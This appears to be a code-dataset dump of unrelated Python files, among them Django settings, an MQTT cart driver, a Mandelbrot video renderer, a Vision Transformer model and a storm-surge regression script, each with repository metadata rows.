ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'todoapp',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [BASE_DIR / 'templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'todo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
# NOTE(review): every password validator is commented out, so any password is
# accepted — presumably deliberate for this demo app; re-enable in production.
# AUTH_PASSWORD_VALIDATORS = [
#     {
#         'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
#     },
#     {
#         'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
#     },
#     {
#         'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
#     },
#     {
#         'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
#     },
# ]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"soner@arslanyapi.com.tr"
] | soner@arslanyapi.com.tr |
71ec5eb99a91022cff32c68fb9a82d33c1fe8b5a | 2a5c0c49319989a24f9c9f18530f109bc48a8df1 | /CursesEnded/SecondYear/PythonJava(InternetOfThings)/list5/driver2.py | c165f04582e1365ac5166f1e5e28d3e6b1d1892d | [] | no_license | Kamil-IT/Studies | 0ada6dd92d7ecdbd0a3164c7c80080dd715ce8fc | d70343b2b7818ce303d816443bb15d21e03b42e0 | refs/heads/master | 2022-12-22T01:55:35.047783 | 2022-10-20T18:55:29 | 2022-10-20T18:55:29 | 217,039,987 | 0 | 1 | null | 2022-12-10T06:03:55 | 2019-10-23T11:24:33 | Jupyter Notebook | UTF-8 | Python | false | false | 1,105 | py | import json
import paho.mqtt.client as mqtt
import requests
def subscribe_topic(broker_url, topic, on_message):
    """Connect to the MQTT broker, subscribe to `topic`, and block forever,
    dispatching every received message to `on_message`."""
    subscriber = mqtt.Client()
    subscriber.on_message = on_message
    subscriber.connect(broker_url)
    subscriber.subscribe(topic)
    subscriber.loop_forever()
def on_message_app2_driver(client, userdata, msg):
    """MQTT callback: steer the cart to stay inside the 41.78-41.80 latitude band.

    The phone-location payload is JSON-decoded once (the original decoded it
    up to twice per message) and the local control service at :6002 is told
    to drive backward, forward, or stop.
    """
    # Parse the payload a single time; 'Latitude' arrives as a string.
    latitude = json.loads(msg.payload.decode('utf-8'))["Latitude"]
    if 41.80 < float(latitude):
        requests.post("http://127.0.0.1:6002/status", json={"reverse": "on", "status": "on"})
        print("Latitude too big " + latitude)
    elif float(latitude) < 41.78:
        requests.post("http://127.0.0.1:6002/status", json={"reverse": "off", "status": "on"})
        print("Latitude too small " + latitude)
    else:
        requests.post("http://127.0.0.1:6002/status", json={"status": "off"})
        print("Latitude good")
def main():
    """Entry point: listen on the local broker for phone GPS updates."""
    subscribe_topic("127.0.0.1", "phone_location", on_message_app2_driver)
if __name__ == '__main__':
    main()
| [
"kkwolny@vp.pl"
] | kkwolny@vp.pl |
eb13bc5a7c58a79ab899c6c06b92d27c1a45639b | 933ed73cdf117fc6c88c1ebba7a17b82807a16e8 | /docs/00.Python/demo_Chapter01/demo_python_structure/pkg/module1.py | 7fde6166ac45f7f13a4c86150943558d3d96b12d | [
"Apache-2.0"
] | permissive | wan230114/PythonNote | c4fff80f6f3849ed0b0346526d3c6197a4867d2c | f4989a44c03efdcea3f7aa3484e3470e7fd983eb | refs/heads/master | 2023-01-28T14:51:07.304066 | 2023-01-12T18:38:16 | 2023-01-12T18:38:16 | 242,367,069 | 5 | 6 | Apache-2.0 | 2021-01-05T23:35:10 | 2020-02-22T15:45:01 | JavaScript | UTF-8 | Python | false | false | 876 | py | """这是该模块1的说明文档"""
# Didactic example: prints a (Chinese) overview of the module's contents at
# import time. The printed text is runtime output and is left untranslated.
print("""这是模块1,它包含:
三个变量: a -- 数值对象, ClassName -- 类对象, func -- 函数对象
一个类: ClassName; 类方法有: __init__, main; 类属性有: self.arg
一个函数: func
五个语句块: 1 * class, 3 * def, 1 * for
七个语句: 5 * print, a = 520, self.arg = arg
""")
# Module-level integer variable referenced by the overview above.
a = 520
class ClassName(object):
    """Demo class: stores one attribute and prints a fixed message from main()."""
    def __init__(self, arg):
        """Store `arg` on the instance."""
        self.arg = arg
    def main(self):
        """Demo instance method: prints a fixed (Chinese) string."""
        print("用于执行类方法的具体语句,打印该行字符串")
"""这是函数的说明文档"""
print("用于打印函数")
print("用于执行函数的具体语句,打印该行字符串")
for i in "123456":
print(i)
| [
"1170101471@qq.com"
] | 1170101471@qq.com |
eac26296fc7adb18685967c93a73c56898d63177 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/playground/mehmet/2011/python-pymodel/actions.py | 2f6b2f799e6cfaa6c12c1a1ad5670d9f8917771d | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2011 TUBITAK/BILGEM
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import pisitools
from pisi.actionsapi import pythonmodules
instalDir = "/usr/lib/python2.7/site-packages"
def install():
    """Install the pymodel package, symlink its tools into /usr/bin, and ship docs."""
    pythonmodules.install()
    pkg_dir = "%s/python-pymodel" % instalDir
    pisitools.insinto(pkg_dir, "pymodel/*")
    # Every shipped command-line tool becomes reachable on the default PATH.
    tools = ("pma.py", "pmg.py", "pmt.py", "trun.py", "dotsvg",
             "clogdiff", "tpath", "dotps", "wsgirunner.py")
    for tool in tools:
        pisitools.dosym("%s/%s" % (pkg_dir, tool), "/usr/bin/%s" % tool)
    for extra in ("samples", "notes"):
        pisitools.insinto("/usr/share/doc/python-pymodel", extra)
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
e3f4ec202b116de4065c3adbc9dff68c89344718 | 7b3009e019e081667df67c6b41328b5db632b898 | /render_video.py | 2c1ab87baf640b84dd9b59daeeae4eb0ce89851e | [
"MIT"
] | permissive | frostburn/multibranch-mandelbrot | d1e2cc6bce6ab8f065b678fb2133bd3057b832d5 | 84e4887ffc90a5338ae448ced6f62fcf40bc11a1 | refs/heads/master | 2023-08-02T18:20:56.671175 | 2021-09-28T09:57:58 | 2021-09-28T09:57:58 | 287,219,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,123 | py | import argparse
from threading import Thread, Lock
import imageio
import progressbar
from pylab import *
from coloring import red_lavender, subharmonics
from mandelbrot import mandelbrot
# Named video resolutions mapped to (width, height) in pixels; each entry is
# half the size of the one above it in both dimensions (16:9 ladder).
RESOLUTIONS = {
    "2160p": (3840, 2160),
    "1440p": (2560, 1440),
    "1080p": (1920, 1080),
    "720p": (1280, 720),
    "480p": (854, 480),
    "360p": (640, 360),
    "240p": (426, 240),
    "160p": (284, 160),
    "80p": (142, 80),
    "40p": (71, 40),
}
def make_video_frame(rgb, indexing='ij', dither=1.0/256.0):
    """Convert a list of float [0, 1] colour channels into a uint8 video frame.

    Optional uniform dither noise is added before quantisation; with
    indexing='ij' the channels are transposed to image (row, column) order.
    Values are clipped to [0, 1] and scaled to 0-255.
    """
    channels = rgb
    if dither:
        channels = [channel + random(channel.shape) * dither for channel in channels]
    if indexing == 'ij':
        channels = [channel.T for channel in channels]
    frame = clip(stack(channels, axis=-1), 0.0, 1.0)
    return (frame * 255).astype('uint8')
def do_render(args, writer):
    """Render a zoom-in animation of the fractal and append frames to `writer`.

    The camera stays fixed on one point while the zoom sweeps linearly from
    -2 to 42 across the clip; each frame is converted to uint8 and handed to
    the video writer.
    """
    inside_cutoff = 2**9
    color_map = subharmonics
    # Fixed point of interest for the zoom (loop-invariant, hoisted).
    x, y = -0.11042608495193805, -1.2321253969758166
    # Guard against ZeroDivisionError when rendering a single frame.
    denom = max(args.num_frames - 1, 1)
    for n in progressbar.progressbar(range(args.num_frames)):
        t = n / denom
        zoom = t * 44 - 2
        image = mandelbrot(args.width, args.height, x, y, zoom, 2.5, 66, color_map=color_map, anti_aliasing=args.anti_aliasing, inside_cutoff=inside_cutoff, clip_outside=True)
        frame = make_video_frame(image, indexing=None)
        writer.append_data(frame)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Render video frames of a Multi-branch Mandelbrot fractal')
    parser.add_argument('outfile', type=str, help='Output file name')
    parser.add_argument('--anti-aliasing', type=int, help='Anti-aliasing pixel subdivisions')
    parser.add_argument('--resolution', choices=RESOLUTIONS.keys(), help='Video and simulation grid resolution')
    parser.add_argument('--width', type=int, help='Video and simulation grid width', metavar='W')
    parser.add_argument('--height', type=int, help='Video and simulation grid height', metavar='H')
    parser.add_argument('--framerate', type=int, help='Video frame rate')
    parser.add_argument('--video-quality', type=int, help='Video quality factor')
    parser.add_argument('--video-duration', type=float, help='Duration of video to render in seconds')
    args = parser.parse_args()
    # Fill in defaults for omitted options (falsy check also overrides 0).
    if not args.anti_aliasing:
        args.anti_aliasing = 2
    if not args.framerate:
        args.framerate = 24
    if not args.video_quality:
        args.video_quality = 10
    writer = imageio.get_writer(args.outfile, fps=args.framerate, quality=args.video_quality, macro_block_size=1)
    # Compute derived parameters
    # Explicit --width/--height take precedence over --resolution.
    if args.resolution:
        width, height = RESOLUTIONS[args.resolution]
        if not args.width:
            args.width = width
        if not args.height:
            args.height = height
    if (not args.width) or (not args.height):
        raise ValueError("Invalid or missing resolution")
    if not args.video_duration:
        raise ValueError("Missing video duration")
    args.aspect = args.width / args.height
    args.num_frames = int(args.video_duration * args.framerate)
    args.dt = 1.0 / args.num_frames
    do_render(args, writer)
    writer.close()
| [
"lumi.pakkanen@gmail.com"
] | lumi.pakkanen@gmail.com |
66b835b459e04052f8a621dc21cce79fcd3161d7 | 52877e2b60ed675eb16ea66c7398127294a313d3 | /t2t_bert/utils/wmd/emd_utils.py | 9cf43816e992e02220600b9cacca89a96f46c2b0 | [
"Apache-2.0"
] | permissive | yyht/BERT | 0dc82ea8e141cad4774e638dd7d44f781d77b6c3 | 480c909e0835a455606e829310ff949c9dd23549 | refs/heads/master | 2023-04-07T03:32:28.123608 | 2021-02-17T02:15:58 | 2021-02-17T02:15:58 | 162,232,730 | 37 | 12 | Apache-2.0 | 2022-11-21T21:15:04 | 2018-12-18T05:02:27 | Python | UTF-8 | Python | false | false | 2,167 | py | import numpy as np
from pyemd import emd
def wmd_distance(w2v_model, document1, document2, distance_metric=None):
    """Word Mover's Distance between two token lists under `w2v_model`.

    Tokens absent from the model are dropped. `distance_metric` may be
    'euclidean' (also the default for any other value) or 'cosine'.
    Returns 0.0 when the joint vocabulary collapses to one token, and a
    small epsilon when all pairwise distances are zero (pyemd's `emd`
    cannot handle an all-zero distance matrix).
    """
    document1 = [token for token in document1 if token in w2v_model]
    document2 = [token for token in document2 if token in w2v_model]
    dictionary = list(set(document1+document2))
    vocab_len = len(dictionary)
    if vocab_len == 1:
        # Both documents are composed by a single unique token
        return 0.0
    # Sets for faster look-up.
    docset1 = set(document1)
    docset2 = set(document2)
    # Compute distance matrix (symmetric; only doc1-token x doc2-token pairs).
    distance_matrix = np.zeros((vocab_len, vocab_len), dtype=np.double)
    for i, t1 in enumerate(dictionary):
        if t1 not in docset1:
            continue
        for j, t2 in enumerate(dictionary):
            if t2 not in docset2 or distance_matrix[i, j] != 0.0:
                continue
            if distance_metric == 'euclidean':
                # BUG FIX: was a bare `sqrt(...)` (NameError — never imported);
                # use np.sqrt like the default branch below.
                euclidean_distance = np.sqrt(np.sum((w2v_model[t1] - w2v_model[t2])**2))
                distance_matrix[i, j] = distance_matrix[j, i] = euclidean_distance
            elif distance_metric == 'cosine':
                t1_norm = np.sqrt(np.sum(np.power((w2v_model[t1]), 2)))
                t2_norm = np.sqrt(np.sum(np.power((w2v_model[t2]), 2)))
                cos_distance = np.sum(w2v_model[t1]*w2v_model[t2]) / (t1_norm*t2_norm+1e-10)
                distance_matrix[i, j] = distance_matrix[j, i] = 1 - cos_distance
            else:
                euclidean_distance = np.sqrt(np.sum((w2v_model[t1] - w2v_model[t2])**2))
                distance_matrix[i, j] = distance_matrix[j, i] = euclidean_distance
    if np.sum(distance_matrix) == 0.0:
        # `emd` gets stuck if the distance matrix contains only zeros.
        return 1e-10
    keys = dict((e[1], e[0]) for e in enumerate(dictionary))
    def nbow(document):
        """Normalized bag-of-words weight vector over the joint vocabulary."""
        d = np.zeros(vocab_len, dtype=np.double)
        for word in document:
            d[keys[word]] += 1
        doc_len = len(document)
        for idx, freq in enumerate(d):
            d[idx] = freq / float(doc_len) # Normalized word frequencies.
        return d
    # Compute nBOW representation of documents.
    d1 = nbow(document1)
    d2 = nbow(document2)
    return emd(d1, d2, distance_matrix)
"albert.xht@alibaba-inc.com"
] | albert.xht@alibaba-inc.com |
28c9e7a82531a49e4999185788a456a178e709e1 | e585c3a61b830d3c24a8cec8343d262c84c724e7 | /CDocente/page_objects/certificados/certificado.py | 2f5e659cdb2509b4cb1c522eee4d2652a84b9a52 | [] | no_license | Valupiruiz/AutomationPHP | bb0728b2b6508b017c133a7d560a652033adeaf4 | 9a92634ac9f5b27e46723294f9a4cc83a1f99252 | refs/heads/master | 2023-01-18T17:27:57.819270 | 2020-11-27T15:04:49 | 2020-11-27T15:04:49 | 310,594,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from page_objects.base_page import BasePage
from .locators import CertificadoLocator
from utils.file_utils import FileUtils
import time
from selenium.common.exceptions import TimeoutException
class Certificado(BasePage):
    """Page object for the certificate form (Selenium)."""
    def __init__(self, driver):
        super().__init__(driver)
        self.__locators = CertificadoLocator()
    def completar_info_basica(self, img, fecha):
        """Fill the basic certificate info: date, image, terms, and submit.

        `fecha` is injected via jQuery into #fecha_certificado; `img` is
        selected through the OS file dialog (FileUtils). The trailing
        try/except swallows the optional confirmation dialog when it does
        not appear.
        """
        # NOTE(review): fixed sleeps suggest the page loads/re-renders slowly
        # here — presumably could be replaced by explicit waits; confirm.
        time.sleep(5)
        # Set the date field directly with jQuery (bypasses the datepicker UI).
        self.driver.execute_script(
            '$("#fecha_certificado").val("'+fecha+'")')
        time.sleep(5)
        self.find_element(self.__locators.AGREGAR_IMG_BTN).click()
        # Drives the native file-picker dialog outside the browser.
        FileUtils.seleccionar_img_gui(img)
        self.find_element(self.__locators.TERMIN_CONDIC_INP).click()
        self.find_element(self.__locators.ACEPTAR_BTN).click()
        try:
            # Optional warning dialog; absent on the happy path.
            self.find_element(self.__locators.ACEPTAR_ADV_BTN).click()
        except TimeoutException:
            pass
| [
"tomasmoreira04@gmail.com"
] | tomasmoreira04@gmail.com |
965cb0a1756aaadfefc1748a36c0fbcf6e13f0e5 | 595d901410872617023f773a6dbe66a174187c42 | /DL/Avanzado/Vision-Transformer/model.py | 66c2689836cdda5250d8bbda32997a8963b935bb | [] | no_license | HiroForYou/Deep-Learning-Collection | 70c3b4405bd0f733aa946b71be0292a497bbb947 | 2b199692739fac8929eb144f9556af544f4eb2ac | refs/heads/main | 2023-03-26T21:57:23.581940 | 2021-03-19T20:12:28 | 2021-03-19T20:12:28 | 346,814,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,343 | py | import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import tensorflow_addons as tfa
from dataset import dataset
import matplotlib.pyplot as plt
# Hyperparameters for the Vision Transformer model
num_classes = 10 # CIFAR10
input_original_shape = (32, 32, 3)
image_size = 72 # Input images are resized to this size
patch_size = 6 # Size of the patches extracted from the input images
num_patches = (image_size // patch_size) ** 2
projection_dim = 64
num_heads = 4
transformer_units = [
    projection_dim * 2,
    projection_dim,
] # Sizes of the transformer's MLP layers
transformer_layers = 8
mlp_head_units = [2048, 1024] # Sizes of the dense layers of the final classifier
def mlp(x, hidden_units, dropout_rate):
    """Stack one Dense(GELU) + Dropout pair per entry in `hidden_units`."""
    out = x
    for width in hidden_units:
        dense = layers.Dense(width, activation=tfa.activations.gelu)
        out = layers.Dropout(dropout_rate)(dense(out))
    return out
class Patches(layers.Layer):
    """Keras layer that splits a batch of images into flattened square patches."""
    def __init__(self, patch_size):
        super(Patches, self).__init__()
        self.patch_size = patch_size
    def call(self, images):
        """Return a (batch, num_patches, patch_dims) tensor of image patches."""
        batch = tf.shape(images)[0]
        window = [1, self.patch_size, self.patch_size, 1]
        raw = tf.image.extract_patches(
            images=images,
            sizes=window,
            strides=window,
            rates=[1, 1, 1, 1],
            padding="VALID",
        )
        flat_dim = raw.shape[-1]
        return tf.reshape(raw, [batch, -1, flat_dim])
class PatchEncoder(layers.Layer):
    """Linearly project each patch and add a learned positional embedding."""
    def __init__(self, num_patches, projection_dim):
        super(PatchEncoder, self).__init__()
        self.num_patches = num_patches
        self.projection = layers.Dense(units=projection_dim)
        self.position_embedding = layers.Embedding(
            input_dim=num_patches, output_dim=projection_dim
        )
    def call(self, patch):
        """Return projection(patch) + embedding(position index) per patch."""
        indices = tf.range(start=0, limit=self.num_patches, delta=1)
        return self.projection(patch) + self.position_embedding(indices)
def create_vit_classifier(data_augmentation):
    """Build the ViT Keras model: augment -> patchify -> encode -> N transformer blocks -> MLP head."""
    inputs = layers.Input(shape=input_original_shape)
    # Data augmentation
    augmented = data_augmentation(inputs)
    # Create the patches
    patches = Patches(patch_size)(augmented)
    # Encode the patches (projection + positional embedding)
    encoded_patches = PatchEncoder(num_patches, projection_dim)(patches)
    # Stack multiple Transformer blocks
    for _ in range(transformer_layers):
        # Layer normalization 1.
        x1 = layers.LayerNormalization(epsilon=1e-6)(encoded_patches)
        # Multi-head self-attention (tfa variant; keras' needs TF >= 2.4, see below)
        '''
        # solo soportado para TF 2.4
        attention_output = layers.MultiHeadAttention(
            num_heads=num_heads, key_dim=projection_dim, dropout=0.1
        )(x1, x1)
        '''
        mha = tfa.layers.MultiHeadAttention(
            head_size=projection_dim, num_heads=num_heads, dropout=0.1
        )
        attention_output = mha([x1, x1])
        # Skip connection 1.
        x2 = layers.Add()([attention_output, encoded_patches])
        # Layer normalization 2.
        x3 = layers.LayerNormalization(epsilon=1e-6)(x2)
        # MLP.
        x3 = mlp(x3, hidden_units=transformer_units, dropout_rate=0.1)
        # Skip connection 2.
        encoded_patches = layers.Add()([x3, x2])
    # Produce a [batch_size, projection_dim]-shaped representation.
    representation = layers.LayerNormalization(epsilon=1e-6)(encoded_patches)
    representation = layers.Flatten()(representation)
    representation = layers.Dropout(0.5)(representation)
    # Add the MLP head
    features = mlp(representation, hidden_units=mlp_head_units, dropout_rate=0.5)
    # Classify the outputs (raw logits, no softmax)
    logits = layers.Dense(num_classes)(features)
    # Create the Keras model
    model = keras.Model(inputs=inputs, outputs=logits)
    return model
if __name__ == "__main__":
    # Smoke-test the patching layer and the classifier on CIFAR10 data.
    (x_train, _, _, _), data_augmentation = dataset(image_size=image_size)
    model = create_vit_classifier(data_augmentation)
    print("\n\nComprobando funcionamiento de los parches...")
    plt.figure(figsize=(4, 4))
    # Pick one random training image and show it.
    image = x_train[np.random.choice(range(x_train.shape[0]))]
    plt.imshow(image.astype("uint8"))
    plt.axis("off")
    resized_image = tf.image.resize(
        tf.convert_to_tensor([image]), size=(image_size, image_size)
    )
    patches = Patches(patch_size)(resized_image)
    print(f"Tamaño de la imagen: {image_size} X {image_size}")
    print(f"Tamaño del parche: {patch_size} X {patch_size}")
    print(f"Parche por imagen: {patches.shape[1]}")
    print(f"Elementos por parche: {patches.shape[-1]}")
    # Display every patch in an n x n grid.
    n = int(np.sqrt(patches.shape[1]))
    plt.figure(figsize=(4, 4))
    for i, patch in enumerate(patches[0]):
        ax = plt.subplot(n, n, i + 1)
        patch_img = tf.reshape(patch, (patch_size, patch_size, 3))
        plt.imshow(patch_img.numpy().astype("uint8"))
        plt.axis("off")
    plt.show()
    print("Comprobando funcionamiento de ViT_Classifier...")
    # Forward one random tensor through the model to verify it runs.
    input_tensor = tf.random.normal([1, 32, 32, 3])
    output_tensor = model.predict(input_tensor)
    print(input_tensor, end="\n\n")
    print(output_tensor, end="\n")
"csanchezs@uni.pe"
] | csanchezs@uni.pe |
09c8465762b44641a8cc4519d5f269a6dc59a91c | 9f9082b2d84da1ade9952c829b8ec99e23db2b98 | /server/fandogh/user/migrations/0001_initial.py | 82beed1205d25f0e08a64e9190376d7f90145cb6 | [
"MIT"
] | permissive | RezaHaidari/fandogh | 384c79fe7eb26e3a7e7f4bf4597e99fa90227921 | 6173ab9dee0e5b9756edf31149aad9af0e0d3564 | refs/heads/master | 2020-03-22T22:53:09.004039 | 2018-07-09T11:36:26 | 2018-07-09T11:36:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # Generated by Django 2.0.4 on 2018-05-11 16:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial auto-generated migration: creates EarlyAccessRequest (id + unique email)."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='EarlyAccessRequest',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.EmailField(max_length=254, unique=True)),
            ],
        ),
    ]
| [
"soroosh.sarabadani@gmail.com"
] | soroosh.sarabadani@gmail.com |
d664dec3a87d05a323144383c5556092f7f21f1b | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merra882/202-tideGauge.py | 4b1714fee2523770b8179de06ec5eb94a4ef4150 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,041 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a multiple
linear regression model by using the KFOLD method
@author: Michael Tadesse
"""
import os
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
from datetime import datetime
from sklearn.linear_model import LinearRegression
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validate():
    """
    run KFOLD method for regression

    For each tide-gauge station file in dir_in: build wind-augmented,
    standardized predictors, merge them with daily-max surge data,
    reduce with PCA (95% explained variance), run 10-fold linear
    regression cross-validation, and write per-station skill metrics
    (correlation, RMSE) to a CSV in dir_out.
    """
    #defining directories
    dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
    dir_out = "/lustre/fs0/home/mtadesse/merraLRValidation"
    surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
    #cd to the lagged predictors directory
    os.chdir(dir_in)
    # Station index range handled by this job (a single station, 202).
    x = 202
    y = 203
    #empty dataframe for model validation
    df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
                                 'num_95pcs','corrn', 'rmse'])
    #looping through
    for tg in range(x,y):
        os.chdir(dir_in)
        # Station files are picked by position in the directory listing.
        tg_name = os.listdir()[tg]
        print(tg, tg_name)
        ##########################################
        #check if this tg is already taken care of
        ##########################################
        os.chdir(dir_out)
        if os.path.isfile(tg_name):
            # NOTE(review): `return` aborts the entire run here, skipping
            # any remaining stations; `continue` was probably intended.
            return "file already analyzed!"
        os.chdir(dir_in)
        #load predictor
        pred = pd.read_csv(tg_name)
        pred.drop('Unnamed: 0', axis = 1, inplace = True)
        #add squared and cubed wind terms (as in WPI model)
        pickTerms = lambda x: x.startswith('wnd')
        wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
        wnd_sqr = pred[wndTerms]**2
        wnd_cbd = pred[wndTerms]**3
        pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
        #standardize predictor data
        # First column is the date; everything else is numeric predictors.
        dat = pred.iloc[:,1:]
        scaler = StandardScaler()
        print(scaler.fit(dat))
        dat_standardized = pd.DataFrame(scaler.transform(dat), \
                                        columns = dat.columns)
        pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
        #load surge data
        os.chdir(surge_path)
        surge = pd.read_csv(tg_name)
        surge.drop('Unnamed: 0', axis = 1, inplace = True)
        #remove duplicated surge rows
        surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
        surge.reset_index(inplace = True)
        surge.drop('index', axis = 1, inplace = True)
        #adjust surge time format to match that of pred
        time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
        surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
        # Used further below to convert the merged 'date' strings back to datetimes.
        time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
        surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
        #merge predictors and surge to find common time frame
        # right-join keeps only dates that have a surge observation.
        pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
        pred_surge.sort_values(by = 'date', inplace = True)
        #find rows that have nans and remove them
        row_nan = pred_surge[pred_surge.isna().any(axis =1)]
        pred_surge.drop(row_nan.index, axis = 0, inplace = True)
        pred_surge.reset_index(inplace = True)
        pred_surge.drop('index', axis = 1, inplace = True)
        #in case pred and surge don't overlap
        if pred_surge.shape[0] == 0:
            print('-'*80)
            # NOTE(review): adjacent string literals concatenate, so this
            # prints "...dont overlap" (missing apostrophe escape).
            print('Predictors and Surge don''t overlap')
            print('-'*80)
            continue
        pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
                                                   pred_surge['date'])), \
                                          columns = ['date'])
        #prepare data for training/testing
        # Columns: [date, predictors..., surge] -> X is everything between.
        X = pred_surge.iloc[:,1:-1]
        # NOTE(review): re-uses the name `y` (the loop bound above) for the
        # regression target; harmless after range() was evaluated, but confusing.
        y = pd.DataFrame(pred_surge['surge'])
        y = y.reset_index()
        y.drop(['index'], axis = 1, inplace = True)
        #apply PCA
        # PCA(.95) keeps as many components as needed for 95% variance.
        pca = PCA(.95)
        pca.fit(X)
        X_pca = pca.transform(X)
        #apply 10 fold cross validation
        # NOTE(review): modern scikit-learn raises if random_state is set
        # while shuffle is left False -- confirm the installed version.
        kf = KFold(n_splits=10, random_state=29)
        metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
        for train_index, test_index in kf.split(X):
            X_train, X_test = X_pca[train_index], X_pca[test_index]
            y_train, y_test = y['surge'][train_index], y['surge'][test_index]
            #train regression model
            lm = LinearRegression()
            lm.fit(X_train, y_train)
            #predictions
            predictions = lm.predict(X_test)
            # pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
            #                       pd.DataFrame(np.array(y_test))], \
            #                      axis = 1)
            # pred_obs.columns = ['pred', 'obs']
            # combo = pd.concat([combo, pred_obs], axis = 0)
            #evaluation matrix - check p value
            # Folds with statistically insignificant correlation are skipped.
            if stats.pearsonr(y_test, predictions)[1] >= 0.05:
                print("insignificant correlation!")
                continue
            else:
                print(stats.pearsonr(y_test, predictions))
                metric_corr.append(stats.pearsonr(y_test, predictions)[0])
                print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
                metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
        #number of years used to train/test model
        num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
                     pred_surge['date'][0]).days/365
        longitude = surge['lon'][0]
        latitude = surge['lat'][0]
        num_pc = X_pca.shape[1] #number of principal components
        corr = np.mean(metric_corr)
        rmse = np.mean(metric_rmse)
        print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
              np.mean(metric_rmse), '\n')
        #original size and pca size of matrix added
        new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
        new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
                          'num_95pcs','corrn', 'rmse']
        df = pd.concat([df, new_df], axis = 0)
        #save df as cs - in case of interruption
        os.chdir(dir_out)
        df.to_csv(tg_name)
